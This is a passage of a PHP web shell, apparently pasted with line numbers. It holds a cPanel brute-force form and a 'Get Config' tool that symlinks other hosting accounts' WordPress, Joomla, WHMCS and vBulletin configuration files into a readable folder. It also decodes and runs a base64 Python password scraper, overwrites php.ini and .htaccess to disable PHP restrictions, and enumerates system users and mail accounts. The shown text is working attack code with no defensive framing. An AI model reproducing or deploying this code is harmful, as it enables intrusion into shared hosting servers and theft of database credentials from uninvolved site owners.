Yl9wYXNzd29yZCddID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyIGlzIG5vdCBOb25lOiBwcmludCAoc2Vjci5ncm91cCgyKSkgIA0KICAgICAgICBzZWNyMSA9IHJlLnNlYXJjaChyIihwYXNzd29yZCA9ICcpKC4rW14+XSkoJzspIiwgbGluZSkNCiAgICAgICAgaWYgc2VjcjEgaXMgbm90IE5vbmU6ICBwcmludCAgKHNlY3IxLmdyb3VwKDIpKQ0KICAgICAgICBzZWNyMiA9IHJlLnNlYXJjaChyIihEQl9QQVNTV09SRCcpKC4uLikoLitbXj5dKSgnKSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IyIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjIuZ3JvdXAoMykpDQogICAgICAgIHNlY3IzID0gcmUuc2VhcmNoIChyIihkYnBhc3MgPS4uKSguK1tePl0pKC47KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3IzIGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjMuZ3JvdXAoMikpDQogICAgICAgIHNlY3I0ID0gcmUuc2VhcmNoIChyIihEQlBBU1NXT1JEID0gJykoLitbXj5dKSguOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNCBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I0Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNSA9IHJlLnNlYXJjaCAociIoREJwYXNzID0gJykoLitbXj5dKSgnOykiLCBsaW5lKQ0KICAgICAgICBpZiBzZWNyNSBpcyBub3QgTm9uZTogcHJpbnQgKHNlY3I1Lmdyb3VwKDIpKQ0KICAgICAgICBzZWNyNiA9IHJlLnNlYXJjaCAociIoZGJwYXNzd2QgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I2IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjYuZ3JvdXAoMikpDQogICAgICAgIHNlY3I3ID0gcmUuc2VhcmNoIChyIihtb3NDb25maWdfcGFzc3dvcmQgPSAnKSguK1tePl0pKCc7KSIsIGxpbmUpDQogICAgICAgIGlmIHNlY3I3IGlzIG5vdCBOb25lOiBwcmludCAoc2VjcjcuZ3JvdXAoMikpDQogICAgICBmLmNsb3NlKCkNCmV4Y2VwdCAoS2V5Ym9hcmRJbnRlcnJ1cHQpOg0KICBwcmludCAnXG5UaGFua3MgZm9yIHVzaW5nIGl0IC5fXic=';
467. $file = fopen("cp.py","w+");
468. $write = fwrite ($file ,base64_decode($cp));
469. fclose($file);
470. chmod("cp.py",0755);
471. $url = $_POST['url'];
472. echo"<center>
473. <textarea cols='90' rows='20' name='usernames'>";
474. system("python cp.py $url config");
475. unlink ('cp.py');
476. echo"</textarea>
477. </center>";
478. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
479. exit;
480. }
481. if($_POST['matikan']=='sekatan'){
482. @error_reporting(0);
483. $phpini =
484. 'c2FmZV9tb2RlPU9GRg0KZGlzYWJsZV9mdW5jdGlvbnM9Tk9ORQ==';
485. $file = fopen("php.ini","w+");
486. $write = fwrite ($file ,base64_decode($phpini));
487. fclose($file);
488. $htaccess =
489. 'T3B0aW9ucyBGb2xsb3dTeW1MaW5rcyBNdWx0aVZpZXdzIEluZGV4ZXMgRXhlY0NHSQ==';
490. $file = fopen(".htaccess","w+");
491. $write = fwrite ($file ,base64_decode($htaccess));
492. echo "<hr><center><b>DONE!";
493. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
494. exit;
495. }
496. if($_POST['mendapatkan']=='passwd'){
497. @set_magic_quotes_runtime(0);
498. ob_start();
499. error_reporting(0);
500. @set_time_limit(0);
501. @ini_set('max_execution_time',0);
502. @ini_set('output_buffering',0);
503. $fn = $_POST['foldername'];
504. //all function here
505.  
506. function syml($usern,$pdomain)
507.     {
508.         symlink('/home/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
509.         symlink('/home/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
510.         symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
511.         symlink('/home/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
512.         symlink('/home/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
513.         symlink('/home/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
514.         symlink('/home/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
515.         symlink('/home/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
516.         symlink('/home/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
517.         symlink('/home/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
518.         symlink('/home/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
519.         symlink('/home/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
520.         symlink('/home/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
521.         symlink('/home/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
522.         symlink('/home/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
523.         symlink('/home/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
524.         symlink('/home/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
525.         symlink('/home/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
526.         symlink('/home/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
527.         symlink('/home/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
528.         symlink('/home/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
529.         symlink('/home/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
530.         symlink('/home/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
531.         symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
532.         symlink('/home/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
533.         symlink('/home/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
534.         symlink('/home/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
535.         symlink('/home/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
536.         symlink('/home/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
537.         symlink('/home/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
538.         symlink('/home2/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
539.         symlink('/home2/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
540.         symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
541.         symlink('/home2/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
542.         symlink('/home2/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
543.         symlink('/home2/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
544.         symlink('/home2/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
545.         symlink('/home2/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
546.         symlink('/home2/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
547.         symlink('/home2/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
548.         symlink('/home2/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
549.         symlink('/home2/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
550.         symlink('/home2/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
551.         symlink('/home2/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
552.         symlink('/home2/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
553.         symlink('/home2/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
554.         symlink('/home2/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
555.         symlink('/home2/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
556.         symlink('/home2/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
557.         symlink('/home2/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
558.         symlink('/home2/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
559.         symlink('/home2/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
560.         symlink('/home2/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
561.         symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
562.         symlink('/home2/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
563.         symlink('/home2/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
564.         symlink('/home2/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
565.         symlink('/home2/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
566.         symlink('/home2/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
567.         symlink('/home2/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
568.         symlink('/home3/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
569.         symlink('/home3/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
570.         symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
571.         symlink('/home3/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
572.         symlink('/home3/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
573.         symlink('/home3/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
574.         symlink('/home3/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
575.         symlink('/home3/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
576.         symlink('/home3/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
577.         symlink('/home3/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
578.         symlink('/home3/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
579.         symlink('/home3/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
580.         symlink('/home3/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
581.         symlink('/home3/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
582.         symlink('/home3/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
583.         symlink('/home3/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
584.         symlink('/home3/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
585.         symlink('/home3/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
586.         symlink('/home3/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
587.         symlink('/home3/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
588.         symlink('/home3/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
589.         symlink('/home3/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
590.         symlink('/home3/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
591.         symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
592.         symlink('/home3/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
593.         symlink('/home3/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
594.         symlink('/home3/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
595.         symlink('/home3/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
596.         symlink('/home3/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
597.         symlink('/home3/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
598.         symlink('/home4/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
599.         symlink('/home4/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
600.         symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
601.         symlink('/home4/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
602.         symlink('/home4/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
603.         symlink('/home4/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
604.         symlink('/home4/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
605.         symlink('/home4/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
606.         symlink('/home4/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
607.         symlink('/home4/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
608.         symlink('/home4/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
609.         symlink('/home4/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
610.         symlink('/home4/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
611.         symlink('/home4/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
612.         symlink('/home4/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
613.         symlink('/home4/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
614.         symlink('/home4/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
615.         symlink('/home4/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
616.         symlink('/home4/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
617.         symlink('/home4/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
618.         symlink('/home4/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
619.         symlink('/home4/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
620.         symlink('/home4/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
621.         symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
622.         symlink('/home4/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
623.         symlink('/home4/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
624.         symlink('/home4/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
625.         symlink('/home4/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
626.         symlink('/home4/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
627.         symlink('/home4/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
628.         symlink('/home5/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
629.         symlink('/home5/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
630.         symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
631.         symlink('/home5/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
632.         symlink('/home5/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
633.         symlink('/home5/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
634.         symlink('/home5/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
635.         symlink('/home5/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
636.         symlink('/home5/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
637.         symlink('/home5/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
638.         symlink('/home5/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
639.         symlink('/home5/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
640.         symlink('/home5/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
641.         symlink('/home5/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
642.         symlink('/home5/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
643.         symlink('/home5/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
644.         symlink('/home5/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
645.         symlink('/home5/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
646.         symlink('/home5/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
647.         symlink('/home5/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
648.         symlink('/home5/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
649.         symlink('/home5/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
650.         symlink('/home5/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
651.         symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
652.         symlink('/home5/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
653.         symlink('/home5/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
654.         symlink('/home5/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
655.         symlink('/home5/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
656.         symlink('/home5/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
657.         symlink('/home5/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
658.         symlink('/home6/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
659.         symlink('/home6/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
660.         symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
661.         symlink('/home6/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
662.         symlink('/home6/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
663.         symlink('/home6/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
664.         symlink('/home6/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
665.         symlink('/home6/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
666.         symlink('/home6/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
667.         symlink('/home6/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
668.         symlink('/home6/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
669.         symlink('/home6/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
670.         symlink('/home6/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
671.         symlink('/home6/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
672.         symlink('/home6/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
673.         symlink('/home6/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
674.         symlink('/home6/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
675.         symlink('/home6/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
676.         symlink('/home6/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
677.         symlink('/home6/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
678.         symlink('/home6/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
679.         symlink('/home6/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
680.         symlink('/home6/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
681.         symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
682.         symlink('/home6/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
683.         symlink('/home6/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
684.         symlink('/home6/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
685.         symlink('/home6/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
686.         symlink('/home6/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
687.         symlink('/home6/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
688.         symlink('/home7/'.$usern.'/public_html/vb/includes/config.php',$pdomain.'~~vBulletin1.txt');
689.         symlink('/home7/'.$usern.'/public_html/includes/config.php',$pdomain.'~~vBulletin2.txt');
690.         symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~vBulletin3.txt');
691.         symlink('/home7/'.$usern.'/public_html/cc/includes/config.php',$pdomain.'~~vBulletin4.txt');
692.         symlink('/home7/'.$usern.'/public_html/config.php',$pdomain.'~~Phpbb1.txt');
693.         symlink('/home7/'.$usern.'/public_html/forum/includes/config.php',$pdomain.'~~Phpbb2.txt');
694.         symlink('/home7/'.$usern.'/public_html/wp-config.php',$pdomain.'~~Wordpress1.txt');
695.         symlink('/home7/'.$usern.'/public_html/blog/wp-config.php',$pdomain.'~~Wordpress2.txt');
696.         symlink('/home7/'.$usern.'/public_html/configuration.php',$pdomain.'~~Joomla1.txt');
697.         symlink('/home7/'.$usern.'/public_html/blog/configuration.php',$pdomain.'~~Joomla2.txt');
698.         symlink('/home7/'.$usern.'/public_html/joomla/configuration.php',$pdomain.'~~Joomla3.txt');
699.         symlink('/home7/'.$usern.'/public_html/whm/configuration.php',$pdomain.'~~Whm1.txt');
700.         symlink('/home7/'.$usern.'/public_html/whmc/configuration.php',$pdomain.'~~Whm2.txt');
701.         symlink('/home7/'.$usern.'/public_html/support/configuration.php',$pdomain.'~~Whm3.txt');
702.         symlink('/home7/'.$usern.'/public_html/client/configuration.php',$pdomain.'~~Whm4.txt');
703.         symlink('/home7/'.$usern.'/public_html/billings/configuration.php',$pdomain.'~~Whm5.txt');
704.         symlink('/home7/'.$usern.'/public_html/billing/configuration.php',$pdomain.'~~Whm6.txt');
705.         symlink('/home7/'.$usern.'/public_html/clients/configuration.php',$pdomain.'~~Whm7.txt');
706.         symlink('/home7/'.$usern.'/public_html/whmcs/configuration.php',$pdomain.'~~Whm8.txt');
707.         symlink('/home7/'.$usern.'/public_html/order/configuration.php',$pdomain.'~~Whm9.txt');
708.         symlink('/home7/'.$usern.'/public_html/admin/conf.php',$pdomain.'~~5.txt');
709.         symlink('/home7/'.$usern.'/public_html/admin/config.php',$pdomain.'~~4.txt');
710.         symlink('/home7/'.$usern.'/public_html/conf_global.php',$pdomain.'~~invisio.txt');
711.         symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~7.txt');
712.         symlink('/home7/'.$usern.'/public_html/connect.php',$pdomain.'~~8.txt');
713.         symlink('/home7/'.$usern.'/public_html/mk_conf.php',$pdomain.'~~mk-portale1.txt');
714.         symlink('/home7/'.$usern.'/public_html/include/config.php',$pdomain.'~~12.txt');
715.         symlink('/home7/'.$usern.'/public_html/settings.php',$pdomain.'~~Smf.txt');
716.         symlink('/home7/'.$usern.'/public_html/includes/functions.php',$pdomain.'~~phpbb3.txt');
717.         symlink('/home7/'.$usern.'/public_html/include/db.php',$pdomain.'~~infinity.txt');
718.     }
719.  
720.                 $d0mains = @file("/etc/named.conf");
721.        
722.                 if($d0mains)
723.                 {
724.                     mkdir($fn);
725.                     chdir($fn);
726.                                        
727.                     foreach($d0mains as $d0main)
728.                     {
729.                         if(eregi("zone",$d0main))
730.                         {
731.                             preg_match_all('#zone "(.*)"#', $d0main, $domains);
732.                             flush();
733.                                
734.                             if(strlen(trim($domains[1][0])) > 2)
735.                             {
736.                                 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
737.                                
738.                                 syml($user['name'],$domains[1][0]);                
739.                             }
740.                         }
741.                     }
742.                     echo "<center><font color=lime size=3>[ Done ]</font></center>";
743.                     echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
744.                 }
745.                 else
746.                 {
747.                     mkdir($fn);
748.                     chdir($fn);
749.                     $temp = "";
750.                     $val1 = 0;
751.                     $val2 = 1000;
752.                     for(;$val1 <= $val2;$val1++)
753.                     {
754.                         $uid = @posix_getpwuid($val1);
755.                         if ($uid)
756.                             $temp .= join(':',$uid)."\n";
757.                      }
758.                      echo '<br/>';
759.                      $temp = trim($temp);
760.                      
761.                      $file5 = fopen("test.txt","w");
762.                      fputs($file5,$temp);
763.                      fclose($file5);
764.  
765. $htaccess =
766. 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh
767. aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp
768. biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk=
769. ';
770. $file = fopen(".htaccess","w+");
771. $write = fwrite ($file ,base64_decode($htaccess));
772.                      
773.                      $file = fopen("test.txt", "r") or exit("Unable to open file!");
774.                      while(!feof($file))
775.                      {
776.                         $s = fgets($file);
777.                         $matches = array();
778.                         $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
779.                         $matches = str_replace("home/","",$matches[1]);
780.                         if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
781.                             continue;
782.                         syml($matches,$matches);
783.                      }
784.                     fclose($file);
785.                     echo "</table>";
786.                     unlink("test.txt");
787.                     echo "<center><font color=lime size=3>[ Done ]</font></center>";
788.                     echo "<br><center><a href=$fn/ target=_blank><font size=3 color=#009900>| Go Here |</font></a></center>";
789.                 }
790. echo "<hr><center><b><a href=".$_SERVER['PHP_SELF'].">BACK</a>";
791. exit;
792. }
793. ?>
794. <form method="POST" target="_blank">
795.     <strong>
796. <input name="page" type="hidden" value="find"><table>                  
797.     </strong><br><br>
798.     <table width="600" border="0" cellpadding="3" cellspacing="1" align="center">
799.     <tr>
800.     <td class="wkwk" bgcolor="#151515" class="wkwk" >
801.     <center><b><font size="5" style="italic" color="teal">CPANEL BRUTE</font></b></center></td></tr>
802.     <tr>
803.     <td>
804.     <table width="100%" border="0" cellpadding="3" cellspacing="1" align="center">
805.     <td class="wkwk" bgcolor="#151515" class="wkwk" >
806.     <strong>User :</strong></td>
807.     <td class="wkwk" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="usernames"><?php system('ls /var/mail');?></textarea></strong></td>
808.     </tr>
809.     <tr>
810.     <td class="wkwk" bgcolor="#151515" class="wkwk" >
811.     <strong>Pass :</strong></td>
812.     <td class="wkwk" bgcolor="#151515" colspan="5"><strong><textarea cols="79" class ='inputz' rows="10" name="passwords"></textarea></strong></td>
813.     </tr>
814.     <tr>
815.     <td class="wkwk" bgcolor="#151515" class="wkwk" >
816.     <strong>Type :</strong></td>
817.     <td class="wkwk" bgcolor="#151515" colspan="5">
818.     <span class="wkwk"><strong>Simple : </strong> </span>
819.     <strong>
820.     <input type="radio" name="type" value="simple" checked="checked" class="style3"></strong>
821.     <font class="wkwk"><strong>/etc/passwd : </strong> </font>
822.     <strong>
823.     <input type="radio" name="type" value="passwd" class="style3"></strong><span class="style3"><strong>
824.     </strong>
825.     </span>
826.     </td>
827.     </tr>
828.     <tr>
829.     <td class="wkwk" bgcolor="#151515" ></td>
830.     <td class="wkwk" bgcolor="#151515"  colspan="5"><strong><input class ='inputzbut' type="submit" value="start">
831.     </strong>
832.     </td>
833.     <tr>
834. </form>
835. <tr>
836.     <td class="wkwk" bgcolor="#151515" class="style1" colspan="6"><strong>Get Config :</strong></td>
837.                     </tr>
838. <form method="POST" target="_blank">
839.     <strong>
840. <input name="mendapatkan" type="hidden" value="passwd">                    
841.     </strong>
842.     <tr>
843.     <td class="wkwk" bgcolor="#151515" ><strong>Folder Name :</strong></td>
844.     <td class="wkwk" bgcolor="#151515"><strong><input class ='inputz' size="35" name="foldername" type="text"></strong></td>
845.     </strong>
846.     </td>
847.     </tr>
848.     <tr>
849.     <td class="wkwk" bgcolor="#151515" ></td>
850.     <td class="wkwk" bgcolor="#151515" colspan="5"><strong><input class ='inputzbut' type="submit" value="GO">
851.     </strong>
852.     </td>
853.     <tr>
854. </form>  
855. <tr>
